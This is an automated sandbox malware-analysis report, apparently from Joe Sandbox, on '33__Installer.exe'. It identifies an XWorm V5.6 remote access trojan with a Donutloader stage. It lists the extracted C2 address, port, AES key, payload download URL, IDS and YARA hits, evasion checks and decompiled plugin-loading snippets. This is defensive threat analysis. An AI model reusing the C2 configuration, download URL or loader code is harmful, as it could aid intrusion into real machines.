Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"} |
Source: 33__Installer.exe |
ReversingLabs: Detection: 26% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: 33__Installer.exe |
Joe Sandbox ML: detected |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: 117.41.184.33 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: 7000 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: <123456789> |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: <Xwormmm> |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: XWorm V5.6 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: USB.exe |
Source: 33__Installer.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: 33__Installer.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.4:49731 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.4:49731 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Malware configuration extractor |
URLs: 117.41.184.33 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 881 |
Source: unknown |
Network traffic detected: HTTP traffic on port 881 -> 49730 |
Source: global traffic |
TCP traffic: 192.168.2.4:49730 -> 91.208.240.157:881 |
Source: global traffic |
TCP traffic: 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Joe Sandbox View |
ASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C23910 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,InternetCloseHandle, |
0_2_00C23910 |
Source: global traffic |
HTTP traffic detected: GET /330.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache |
Source: global traffic |
DNS traffic detected: DNS query: guanlix.cn |
Source: 33__Installer.exe |
String found in binary or memory: http://guanlix.cn:881/330.ccp |
Source: 33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://guanlix.cn:881/330.ccp&( |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process Stats: CPU usage > 49% |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C301C9 |
0_2_00C301C9 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C359E9 |
0_2_00C359E9 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C309FC |
0_2_00C309FC |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C311B6 |
0_2_00C311B6 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C36B67 |
0_2_00C36B67 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C3648B |
0_2_00C3648B |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C30DCE |
0_2_00C30DCE |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C3065E |
0_2_00C3065E |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C37E2F |
0_2_00C37E2F |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C35F3A |
0_2_00C35F3A |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_0617A010 |
0_2_0617A010 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06174E68 |
0_2_06174E68 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06177CB0 |
0_2_06177CB0 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06175B40 |
0_2_06175B40 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_0617E920 |
0_2_0617E920 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_061707A0 |
0_2_061707A0 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06174B20 |
0_2_06174B20 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: String function: 00C2AF90 appears 45 times |
Source: 33__Installer.exe, 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe |
Source: 33__Installer.exe, 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameXClient.exe4 vs 33__Installer.exe |
Source: 33__Installer.exe |
Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@1/2@1/2 |
Source: C:\Users\user\Desktop\33__Installer.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp |
Source: C:\Users\user\Desktop\33__Installer.exe |
Mutant created: NULL |
Source: C:\Users\user\Desktop\33__Installer.exe |
Mutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH |
Source: 33__Installer.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wininet.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: iertutil.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: urlmon.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: srvcli.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: netutils.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: amsi.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: avicap32.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: msvfw32.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Plugin System.AppDomain.Load(byte[]) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Memory System.AppDomain.Load(byte[]) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Memory |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
0_2_00C345F4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C27059 push ecx; ret |
0_2_00C2706C |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C26004 push dword ptr [ecx-75h]; iretd |
0_2_00C26011 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316CD push 00000008h; ret |
0_2_00C316CF |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316E9 push cs; ret |
0_2_00C316F7 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316F8 push es; ret |
0_2_00C316FF |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2AFD5 push ecx; ret |
0_2_00C2AFE8 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_061770F8 pushad ; iretd |
0_2_06177105 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\33__Installer.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 3D70000 memory reserve | memory write watch |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 4020000 memory reserve | memory write watch |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 3E50000 memory reserve | memory write watch |
Source: C:\Users\user\Desktop\33__Installer.exe |
Window / User API: threadDelayed 2052 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Window / User API: threadDelayed 7787 |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5920 |
Thread sleep time: -23980767295822402s >= -30000s |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328 |
Thread sleep count: 2052 > 30 |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328 |
Thread sleep count: 7787 > 30 |
Source: C:\Users\user\Desktop\33__Installer.exe |
File Volume queried: C:\ FullSizeInformation |
Source: 33__Installer.exe, 00000000.00000002.4105093119.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014DA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\33__Installer.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00C2AD72 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_03CB1628 mov eax, dword ptr fs:[00000030h] |
0_2_03CB1628 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C37B91 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, |
0_2_00C37B91 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2CD6D SetUnhandledExceptionFilter, |
0_2_00C2CD6D |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C26FE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00C26FE1 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: page read and write | page guard |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Program Manager |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Program Managert-^q |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0 |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0 |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C21720 cpuid |
0_2_00C21720 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, |
0_2_00C349CA |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, |
0_2_00C34AA4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00C2FAAD |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, |
0_2_00C2FBA2 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, |
0_2_00C2FCA4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, |
0_2_00C2FC49 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: GetLocaleInfoA, |
0_2_00C34D69 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, |
0_2_00C2FE75 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, |
0_2_00C2FFD8 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_00C2FF9C |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_00C2FF35 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Source: C:\Users\user\Desktop\33__Installer.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C24CAA GetSystemTimeAsFileTime,__aulldiv, |
0_2_00C24CAA |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\user\Desktop\33__Installer.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR |